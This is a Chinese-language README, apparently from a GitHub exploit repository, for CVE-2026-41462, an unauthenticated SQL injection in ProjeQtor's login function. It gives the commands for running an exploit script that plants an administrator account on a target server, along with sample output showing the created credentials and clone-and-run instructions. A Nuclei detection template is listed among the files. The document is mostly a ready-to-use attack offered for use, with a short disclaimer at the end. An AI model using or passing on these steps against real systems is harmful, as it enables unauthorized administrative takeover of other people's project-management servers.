
CVE-2026-41462
ProjeQtor ≤ 12.4.3 中的严重未认证 SQL 注入
CVE-2026-41462 是 ProjeQtor 项目管理工具登录功能中的一个严重未认证 SQL 注入漏洞。
python3 CVE-2026-41462.py -u http://target.com --create-admin
# 使用自定义凭据
python3 CVE-2026-41462.py -u http://target.com --create-admin \
--username admin123 --password StrongPass2026!
当漏洞利用成功时,您将看到类似如下的输出:
[+] 目标:http://target.com
[+] 正在发送用于创建管理员用户 'hacker' 的 payload……
[+] 请求发送成功。
[+] 已创建新管理员 → 用户名:hacker | 密码:Admin123!
[+] 请尝试登录:http://target.com/login.php
打开浏览器并访问:
http://target.com/login.php
使用脚本输出中显示的凭据登录。
如果成功,您将进入 ProjeQtor 管理仪表板,并拥有完全的管理权限。
成功标志:
| 文件 | 描述 |
|---|---|
CVE-2026-41462.py | 主要利用脚本 |
CVE-2026-41462.yaml | Nuclei 检测模板 |
README.md | 本文档 |
克隆仓库:
git clone https://github.com/0xBlackash/CVE-2026-41462.git
cd CVE-2026-41462
运行利用脚本:
python3 CVE-2026-41462.py -u http://target.com --create-admin
使用新创建的管理员账户登录。
此工具仅用于教育目的和授权渗透测试。未经授权使用属违法行为。